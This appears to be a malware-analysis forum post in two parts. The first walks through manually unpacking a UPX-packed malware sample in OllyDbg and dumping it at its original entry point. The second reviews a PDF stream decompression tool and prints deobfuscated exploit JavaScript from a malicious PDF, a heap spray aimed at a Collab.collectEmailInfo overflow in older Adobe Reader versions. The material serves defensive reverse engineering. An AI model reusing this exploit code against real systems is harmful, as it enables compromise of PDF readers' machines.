joren

Open the file in OllyDbg. Will look something like the following:

Code:

00401023 >/$ 55             PUSH EBP
00401024  |. 8BEC           MOV EBP,ESP
00401026  |. 6A FF          PUSH -1
00401028  |. 68 DC254000    PUSH card.004025DC
0040102D  |. 68 E1104000    PUSH card.004010E1     ;  SE handler installation
....
0040108D  |. B8 56224000    MOV EAX,card.00402256
00401092  |. 8902           MOV DWORD PTR DS:[EDX],EAX
00401094  |. 50             PUSH EAX                                 ; /ExitCode => 402256
00401095  \. FF15 4C304600  CALL DWORD PTR DS:[<&kernel32.ExitProces>; \ExitProcess

The call at the bottom is not always ExitProcess (GlobalLock, VirtualProtect, etc)

Go to address 00401000 in the dump and set a Breakpoint -> Hardware, on access -> Byte and run with F9

An access violation will occur on 00401092. This is intentional, press Shift+F9 to pass exception to the program

Your breakpoint will eventually hit and you may need to re-analyze (ctrl-a):

Code:

004011C3  |. 89C1           MOV ECX,EAX    ; landed here
004011C5  |. 83E1 03        AND ECX,3
004011C8  |. 83C6 03        ADD ESI,3
004011CB  |. 83C7 03        ADD EDI,3
004011CE  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
004011D0  |. FC             CLD
004011D1  |> 5F             POP EDI
004011D2  |. 5E             POP ESI
004011D3  \. C3             RETN

Execute the return. You will then land in an area like the following:

Code:

00401663  |> 8D55 F4        |LEA EDX,DWORD PTR SS:[EBP-C]
00401666  |. 52             |PUSH EDX
00401667  |. 6A 40          |PUSH 40
....
00401681  |. FF4D F0        |DEC DWORD PTR SS:[EBP-10]
00401684  |.^75 8F          \JNZ SHORT card.00401615
00401686  |> 5F             POP EDI
00401687  |. 5E             POP ESI
00401688  |. 5B             POP EBX
00401689  |. 8BE5           MOV ESP,EBP
0040168B  |. 5D             POP EBP
0040168C  \. C2 1000        RETN 10

Execute the return here as well. You will then land in an area like the following:

Code:

004017FF  |. 8B7424 04      MOV ESI,DWORD PTR SS:[ESP+4]
00401803  |. 2BF3           SUB ESI,EBX
00401805  |. BF E8164000    MOV EDI,card.004016E8
0040180A  |. 03FE           ADD EDI,ESI
0040180C  |. 89F8           MOV EAX,EDI
0040180E  |. 53             PUSH EBX
0040180F  |. 56             PUSH ESI
00401810  |. FFD0           CALL EAX

Remove all breakpoints at this point. Note the CALL EAX at 00401810. Step into this call:

Code:

009216E8   55               PUSH EBP
....
0092176A   E8 29FDFFFF      CALL 00921498
0092176F   8BCB             MOV ECX,EBX
00921771   8B55 FC          MOV EDX,DWORD PTR SS:[EBP-4]
00921774   8B45 F8          MOV EAX,DWORD PTR SS:[EBP-8]
00921777   E8 30FDFFFF      CALL 009214AC
0092177C   83F8 01          CMP EAX,1
0092177F   75 20            JNZ SHORT 009217A1
....
0092179A   FF13             CALL DWORD PTR DS:[EBX]    ; kernel32.CreateThread
0092179C   6A FF            PUSH -1
0092179E   FF53 04          CALL DWORD PTR DS:[EBX+4]  ; kernel32.Sleep
009217A1   6A 00            PUSH 0
009217A3   FF53 24          CALL DWORD PTR DS:[EBX+24]

Continue single-stepping. Once you step over the call located at 00921777 you will see some modules were loaded (Alt-e). We are getting somewhere..

At this point go to the memory map (Alt-m), right-click the malware's .text section -> Set break-on-access. Now run with F9 again. You should get a break-on-access when writing to 00401000:

Code:

004ED0F3   8807             MOV BYTE PTR DS:[EDI],AL     ; bp hits here
004ED0F5   47               INC EDI
004ED0F6   01DB             ADD EBX,EBX
004ED0F8   75 07            JNZ SHORT card.004ED101
004ED0FA   8B1E             MOV EBX,DWORD PTR DS:[ESI]
004ED0FC   83EE FC          SUB ESI,-4
004ED0FF   11DB             ADC EBX,EBX
004ED101  ^72 ED            JB SHORT card.004ED0F0
004ED103   B8 01000000      MOV EAX,1
004ED108   01DB             ADD EBX,EBX
004ED10A   75 07            JNZ SHORT card.004ED113

Now we know we have required modules loaded and we are writing code...Scroll down a bit and you will see:

Code:

004ED27E   61               POPAD    ; restore registers
004ED27F   8D4424 80        LEA EAX,DWORD PTR SS:[ESP-80]
004ED283   6A 00            PUSH 0
004ED285   39C4             CMP ESP,EAX
004ED287  ^75 FA            JNZ SHORT card.004ED283
004ED289   83EC 80          SUB ESP,-80
004ED28C  ^E9 0121FAFF      JMP card.0048F392     ; jmp to OEP
004ED291   0000             ADD BYTE PTR DS:[EAX],AL

Looks like your typical UPX jump to OEP code... Remove all breakpoints and set a hardware breakpoint on execution on the JMP (004ED28C) and run with F9. The breakpoint should hit and now single-step execute the instruction. You should land here:

Code:

0048F392   E8 3AC50000      CALL card.0049B8D1  ; OEP
0048F397  ^E9 16FEFFFF      JMP card.0048F1B2
0048F39C   CC               INT3

At this point we can dump the debugged process and fix the imports. As a note, Olly had some issues dumping this (atleast for me) so I simply used LordPE. This method is obviously not the shortest, but was the initial flow I took when attempting to unpack it. Again, the addresses will obviously change, but the areas of code and this unpacking method seem to work well.

Nothing too difficult, but someone may learn/benefit from the above. Ping me if you see any errors...

The author of Malzilla released a tool recently titled 'PDF steams inflater'. It takes zlib compressed streams, decompresses them, and reveals the output.

If you open a PDF file in a text editor these areas are denoted like so:

Code:

stream
xœ¥Wmoâ:þ¾Òþ‡¨Ò®@3í&tŠz©È
…..
endstream

It works quite well, as I threw it a malicious PDF I had and received the following output:

Code:

....

function evil(){
var b=app.viewerVersion.toString();
b=b.replace(/\D/g,'');
var c = new Array(b.charAt(0),b.charAt(1),b.charAt(2));
if((c[0]==8&&((c[1]==1&&c[2]<2)||c[1]<1))||(c[0]==7&&c[1]<1)||(c[0]<7)){
	d();
	var e=unescape("%u0c0c%u0c0c");
	while(e.length<44952)
		e+=e;
	this.collabStore=Collab.collectEmailInfo({subj: "",msg: e});
	}
}

A simple Google search reveals this an attempt at exploiting an overflow vulnerability in Adobe's JS engine.

Overall, a great tool that everyone should throw into their arsenal.

Original post and links to download the tool can be found here